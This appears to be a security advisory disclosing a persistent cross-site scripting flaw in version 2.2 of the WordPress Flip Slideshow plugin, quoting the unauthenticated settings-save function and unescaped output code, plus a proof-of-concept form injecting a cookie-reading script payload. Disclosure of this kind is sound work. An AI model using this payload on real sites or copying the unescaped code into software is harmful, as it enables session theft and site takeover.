07 Jun

Persistent Cross-Site Scripting (XSS) Vulnerability in Flip Slideshow

The Flip Slideshow plugin has a persistent cross-site scripting (XSS) vulnerability (and possibly other security issues) as of version 2.2.

Due to a issue with code shared among several plugins, which we first found in the  Vertical Slideshow plugin, functions intended for Administrator level users in this plugin are accessible to anyone (even if they are not logged in). One of those is save_flp_settings(), which saves values for the plugin’s settings:

133
134
135
136
137
138
139
140
141
142
143
144
145
public function save_flp_settings()
{
	$ops = array();
	foreach($_POST['settings'] as $key => $value)
	{
		$ops[$key] = trim($value);
	}
	update_option('flp_settings', $ops);
	/*
insert xml code part
	*/
 
}

When the values are outputted on the plugin’s settings page, /wp-admin/admin.php?page=flipslideshow_settings, through the file /html/settings.php they are not escaped. For example, the value for “settings[bannerWidth]” is set on line 13:

13
<td><input type="text" name="settings[bannerWidth]"  value="<?php print @$ops['bannerWidth']; ?>" /></td>

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the page /wp-admin/admin.php?page=flipslideshow_settings.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=flipslideshow_settings" method="post">
<input type="hidden" name="task" value="save_flp_settings" />
<input type="hidden" name="settings[bannerWidth]" value='"><script>alert(document.cookie);</script>' />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 6/7/2016 – WordPress.org Plugin Directory notified.

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *